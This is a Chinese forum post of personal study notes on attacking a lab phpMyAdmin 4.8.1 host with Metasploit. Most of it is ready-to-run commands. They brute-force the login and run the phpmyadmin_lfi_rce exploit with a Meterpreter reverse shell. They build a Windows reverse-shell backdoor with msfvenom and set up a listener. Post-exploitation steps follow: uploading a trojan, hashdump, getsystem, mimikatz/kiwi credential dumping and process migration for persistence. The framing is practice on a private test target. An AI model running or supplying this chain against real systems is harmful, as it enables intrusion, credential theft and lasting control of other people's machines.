MSF的简单学习

zbs   ·   发表于 2023-12-12 12:18:51   ·   学习杂记


准备好一个phpmyadmin4.8.1作为靶场,试试利用msf来完成攻击

MSF通常针对这种nday的漏洞,非常的好用
第一次使用msf,需要操作以下步骤:


然后就可以开始开干了;


msf的框架:
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持

Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码

Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统

Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截

先选择辅助模块的密码爆破模块:
use auxiliary/scanner/http/phpmyadmin_login
其实这个用bp自己爆一样,因为字典也是要自己准备的


use成功会附带小括号在旁边
然后options,去看这个模块的选项功能,yes的是你需要去设置的
比如这里:
set pass_file ~/Desktop/psw.txt(把字典放桌面就好)
set rhosts 192.168.1.5 (目标主机ip)
set targeturi /phpadmin4.8.1/index.php (目标主机phpmyadmin登录目录)
set threads 2 (设置进程数)
然后run就开始进攻了:


【然后我就发现我这本弱口令应该要换了,我设的6位数字的密码都爆不成功】
假装爆破成功—》进入下一个功能:


4.8.0-4.8.1版本是有文件包含漏洞,详情不细说【课程有】
我们利用phpmyadmin漏洞进行攻击
选择对应的攻击模块
use exploit/multi/http/phpmyadmin_lfi_rce:


设置参数和payload:
set rhosts 192.168.1.5 (设置目标主机ip)
set password 047047 (设置目标主机phpmyadmin密码)【虽然options显示no,但是其实必须得填,要不然第一步在干嘛呢】
set payload php/meterpreter/reverse_tcp 【反向连接】
set lhost 192.168.1.128 (设置攻击机机ip【你kali的ip】)
set lport 4747 (设置靶机连接攻击机的端口【随便设个没用的】)


targeturi这里也是个坑,记得需要/xxxx/,因为这里有个302重定向,后面不加/就会失败

还是失败了


本贴终结
【netstat -tln查看使用端口,fuser -k 端口号/tcp 关闭端口】
后续【按道理上步应该成功,but失败了我们就手搓后门】:msf创建一个后门文件

  1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.128 lport=14444 -f exe > D88047.exe
  2. -p 选择使用的payload
  3. -f 生成的文件格式
  4. 这里是一个没有任何免杀能力的后门文件,免杀这里暂且不谈

payload选择:


msfvenom 用来生成后门文件

  1. 将生成的后门放到目标系统上

  2. 在msf中创建一个监听=>use exploit/multi/handler 启用这个监听模块
    需要去更改payload options,用什么payload生成的后门,就要改成什么

【bind正向,reverse反向】
反向连接 => 目标 => 我们 vps(公网IP) 【防护设备可能不检测服务器发起的请求。】

  1. 根据设置的ip和端口【这里是我们vps的ip和端口】,启动监听【使用对应的payload】
    =>set payload windows/x64/meterpreter/reverse_tcp
    =>options查看: Payload options (windows/x64/meterpreter/reverse_tcp): [针对攻击载荷进行设置]
    LHOST vps的ip => set lhost xxx
    LPORT 端口 => set lport xxx
    run=>开始监听
  2. 当目标执行了payload之后【运行后门文件】,目标系统就会去访问设置的IP和端口,我们就获得了目标的权限-终端(getshell)


在靶机送去我们的后门文件
然后监听:
【记得set payload windows/x64/meterpreter/reverse_tcp!!!要不然就会跟个小丑一样在呢不知道为什么连不上,像我有个朋友一样肯定不是我】


终于成功啦,进入到了meterpreter现在才刚开始!


进入到提权环节:

提权

getuid=>查看权限:


若是之前通过use exploit/multi/http/phpmyadmin_lfi_rce连接,则是php连接并不稳定,我们就可以用这种方式丢一个木马进去,用它进行连接,变成windows连接,较稳定:upload shell.exe=》execute -f shell.exe
sysinfo查看:

hashdump、getsystem (权限低都做不了)


获得system权限后可以获取管理员账号和密码
加载mimikatz=》我们使用MSF中的mimikatz:load mimikatz or load kiwi
meterpreter > creds_kerberos 读取明文密码:

meterpreter > creds_msv 读取hash

迁移进程
查看进程:ps


选择一个有system权限的进程
迁移进程:
migrate pid:


这样如果后门木马被删了:


但我们的连接还是在继续:


除非把我们迁移到的进程给关了,否则这台服务器就被我们黑了

打赏我,让我更有动力~

0 条回复   |  直到 2023-12-12 | 352 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.